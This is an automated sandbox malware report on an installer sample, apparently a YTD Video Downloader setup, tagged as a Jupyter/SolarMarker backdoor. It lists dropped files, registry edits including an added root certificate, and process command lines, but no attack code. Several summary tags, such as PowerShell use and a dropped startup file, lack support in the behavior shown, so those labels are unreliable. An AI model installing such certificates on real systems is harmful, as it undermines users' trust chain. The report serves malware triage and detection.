Malware Analysis Report

2024-10-16 02:54

Sample ID 241003-fzd8eswfrk
Target 0e19c4e90440e8ebf974e705990fadde_JaffaCakes118
SHA256 b0d7b86568b29605b5b9209be95f88d7033d6ab8ae9c6c1a100b44b8ea9e02fb
Tags
discovery jupyter backdoor execution stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

b0d7b86568b29605b5b9209be95f88d7033d6ab8ae9c6c1a100b44b8ea9e02fb

Threat Level: Known bad

The file 0e19c4e90440e8ebf974e705990fadde_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

discovery jupyter backdoor execution stealer trojan

Jupyter Backdoor/Client payload

Jupyter, SolarMarker

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Drops startup file

Checks computer location settings

Executes dropped EXE

Checks installed software on the system

Command and Scripting Interpreter: PowerShell

Drops file in Program Files directory

Browser Information Discovery

System Location Discovery: System Language Discovery

Program crash

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Modifies system certificate store

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-03 05:18

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-03 05:18

Reported

2024-10-03 05:21

Platform

win7-20240903-en

Max time kernel

118s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

Signatures

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Checks installed software on the system

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1040.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1053.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1033.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1060.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\plugins.dat.1904 C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1038.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1052.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2070.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\librtmp.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\LICENSE C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1031.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1048.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1030.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1059.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res9999.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1025.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1045.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\manual.bat C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1034.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1035.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1061.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1029.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv2 C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1026.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1050.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.Apachev2 C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1055.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1032.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2052.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1044.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1051.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv3 C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1036.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1043.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1049.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\FFMPEG.EXE C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2074.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "60" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434094598" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "340" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "60" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "99" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "21" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0a1b2c15315db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "340" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "21" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "21" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "60" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\ytddownloader.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\ytddownloader.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "340" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F91622B1-8146-11EF-B4B0-E62D5E492327} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "99" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "99" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2416 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 2072 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe
PID 2412 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2516 wrote to memory of 1188 N/A C:\Windows\explorer.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1188 wrote to memory of 1304 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2412 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2976 wrote to memory of 1904 N/A C:\Windows\explorer.exe C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
PID 1188 wrote to memory of 2436 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1904 wrote to memory of 912 N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe

"C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp" /SL5="$5014E,116245401,999936,C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe

"C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" "http://www.ytddownloader.com/thankyou.html?isn=726E4E9A08134383846087603581901B&lang=1033&cid=bea3b60f7c56915a47cb6bcf8ab37087&oldVer=&newVer=5.9.18&kt=ytdd&pv=0"

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.ytddownloader.com/thankyou.html?isn=726E4E9A08134383846087603581901B&lang=1033&cid=bea3b60f7c56915a47cb6bcf8ab37087&oldVer=&newVer=5.9.18&kt=ytdd&pv=0

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1188 CREDAT:275457 /prefetch:2

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" "C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe

"C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1188 CREDAT:537606 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 2404

Network


Files


